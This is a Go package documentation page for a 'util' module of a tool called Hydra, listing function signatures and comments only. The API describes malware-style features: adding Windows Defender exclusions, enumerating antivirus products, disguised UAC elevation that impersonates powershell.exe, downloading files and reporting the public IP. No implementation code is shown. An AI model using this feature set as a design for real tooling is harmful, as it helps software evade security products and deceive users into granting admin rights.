util

package
v0.0.0-...-cd96e8e Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Mar 7, 2023 License: MIT Imports: 20 Imported by: 0

Documentation

Index

Constants

const (
	IPProvider = "http://api.ipify.org"
	Soul       = "8894fafe64c043b62"
	Version    = "0.1"
	Debug      = true
)

Variables

var (
	Doze      int    = 5
	Dem       bool   = false
	Dbg       bool   = false
	ID        string = "IDKey"
	Mycellium string = "SecretAccessKey"
	StartTime        = time.Now()
)
var SysInf string

Functions

func AddDefenderExclusion

func AddDefenderExclusion(path string) error

func AntiInfo

func AntiInfo() string

AVInfo returns information about installed antivirus products.

func CPUInfo

func CPUInfo() string

func Calm

func Calm()

Calm consumes top-level errors. Defer this if you want to be absolutely certain that local errors should be ignored.

func CondenseAntiList

func CondenseAntiList(antis []*anti) map[string]byte

func CopyFile

func CopyFile(src, dst string) error

CopyFile attempts to copy a file from src to dst. Attributes are not preserved. Environment variables in paths are not supported.

func DownloadFile

func DownloadFile(filepath string, url string) error

DownloadFile will download a url to a local file. It's efficient because it will write as it downloads and not load the whole file into memory.

func ElevateDisguised

func ElevateDisguised() error

ElevateDisguised attempts to relaunch Hydra with admin rights. It displays a common UAC prompt to the user, containing the details of an executable signed by Microsoft, namely powershell.exe.

func ElevateLogic

func ElevateLogic() error

func ElevateNormal

func ElevateNormal() error

ElevateNormal attempts to relaunch Hydra with admin rights. It displays a common UAC prompt to the user, with the name of the executable.

func Fb64

func Fb64(text string) (string, error)

func FileF64

func FileF64(text string, tag string) (string, error)

func FileT64

func FileT64(file string) string

func GPUInfo

func GPUInfo() string

func Gate

func Gate(recp string) bool

func GrabPIP

func GrabPIP(fmt bool) string

func Handle

func Handle(err error, str ...interface{})

Handle will panic when given a valid error and print some debug info.

func Info

func Info() string

func IsUserAdmin

func IsUserAdmin() bool

IsUserAdmin checks if the current user is an administrator. If the process is impersonating a user, it will return that value.

func IsWritable

func IsWritable(path string) bool

IsWritable return whether a path or a file is writable.

func MemoryInfo

func MemoryInfo() string

func ParseAntiState

func ParseAntiState(state int) byte

func ParseAntisByClass

func ParseAntisByClass(class string) []*anti

func Register

func Register(info string) (string, string)

func RemoveDefenderExclusion

func RemoveDefenderExclusion(path string) error

func RemoveDuplicates

func RemoveDuplicates(slice []string) []string

RemoveDuplicates returns a new slice with duplicate elements removed.

func RemoveDuplicatesValues

func RemoveDuplicatesValues(arrayToEdit []string) []string

RemoveDuplicatesValues: A helper function to remove duplicate items in a list

func RunAsAdmin

func RunAsAdmin(command, arguments string) error

RunAsAdmin attempts to execute a command with admin rights.

func RunDecrypt

func RunDecrypt(cipherKey []byte, msg string) string

func RunEncrypt

func RunEncrypt(cipherKey []byte, msg string) string

func RunningAsAdmin

func RunningAsAdmin() bool

RunningAsAdmin returns whether the current process has administrative privileges.

func SSf64

func SSf64(text string, tag string) (string, error)

func SSt64

func SSt64(b []byte) string

func SoftwareInfo

func SoftwareInfo() string

func Tb64

func Tb64(text string) string

func ToBase64

func ToBase64(b []byte) string

func UpdateStats

func UpdateStats([]int)

func WriteLog

func WriteLog(ltype string, message string)

Types

This section is empty.

Jump to